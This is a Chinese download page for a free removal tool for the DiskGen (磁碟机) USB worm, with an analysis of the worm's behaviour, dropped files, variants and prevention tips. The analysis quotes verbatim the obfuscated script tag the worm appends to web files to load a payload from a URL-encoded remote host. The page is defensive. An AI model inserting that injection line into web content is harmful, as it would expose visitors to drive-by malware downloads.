磁碟机专杀
- 软件名称:磁碟机专杀
- 软件类别:专杀工具
- 软件版本:
- 软件大小:85.0K
- 应用平台:Win2003/WinXP/Win2000/NT/WinME/Win9X/
- 更新时间:2008-03-27 18:03:09
- 授权方式:免费软件
软件说明
病毒评估
- 病毒名称: 磁碟机病毒
- 病毒名称英文:Worm.DiskGen
- 病毒类型:感染型
- 危险级别:★★★☆
- 传播方式:U盘
- 受影响的系统: Windows 2000, Windows XP, Windows Server 2003
- 未受影响的系统:Windows 3.x, Macintosh, Unix, Linux
病毒危害:
- 1 破坏本机杀毒软件运行,删除本机杀毒软件服务、驱动等。
- 2 感染本机 .exe, .htm, .html, .js, .rar, .zip文件。
- 3 释放DLL文件,注册COM组件,弹出广告,下载其他病毒、木马。
- 4 中毒后系统无法进入安全模式、组策略功能也被禁用。
传播形式:
- 1)网页文件:.htm, .html, .js
感染方法:在文件尾部追加字符串document.write("<ScRiPt src='http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70'></sCrIpT>");或字符串<ScRiPt src="http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></sCrIpT>
- 2)可执行程序:.exe
被感染的exe文件有三个部分组成:
- a)加了被感染程序图标的病毒体。
- b)被加密的原程序。
- c)加密的病毒体。
- 3)压缩文件:.rar, .zip
将压缩包内文件解压,并感染,再打包。5 在每个磁盘分区的根目录下生成AutoRun.Inf、pagefile.pif和~.exe.*.exe文件,实现死灰复燃。在“开始”菜单的启动项中生成~.exe.*.exe文件,其中*为一串随机数字。
6 破坏安全模式、删除注册表中“显示隐藏文件属性”键值。
1 病毒首先释放以下文件到X:\WINDOWS\system32\com文件夹下:
lsass.exe , smss.exe, netcfg.dll, netcfg.000
释放文件dnsq.dll到X:\WINDOWS\system32文件夹下。
2 启动lsass.exe,smss.exe进程,感染文件。然后加载netcfg.dll,并全局注入dnsq.dll。
3 dnsq.dll文件负责监视杀毒软件及工具的运行,如果发现就将其关闭,关且它还监控病毒进程lsass.exe和smss.exe。
4 该病病毒会感染三种类型的文件:
清除病毒
- Worm.Win32.DiskGen.ca
- Worm.Win32.DiskGen.ci
- Worm.Win32.DiskGen.ex
- Worm.Win32.DiskGen.gfh
- Worm.Win32.DiskGen.u
- Worm.Win32.DiskGen.vin
- Worm.Win32.DiskGen.vio
- Worm.Win32.DiskGen.vip
- Worm.Win32.DiskGen.viq
- Worm.Win32.DiskGen.xx
目前SanLen磁碟机病毒专杀共可清除十个磁碟机病毒变种,即:
预防和处理办法:
- 1 关闭U盘的“自动播放功能”。运行可执行程序时先进行杀毒。
- 2 及时升级系统漏洞。
- 3 将病毒库升级到最新,并开启防病毒软件的实时监控。
选择下载点
重要提示:
☉为了达到最快的下载速度,推荐使用下载软件下载
本站软件。
☉未经本站明确许可,任何网站不得非法盗链软件下载连接
及抄袭本站原创内容资源!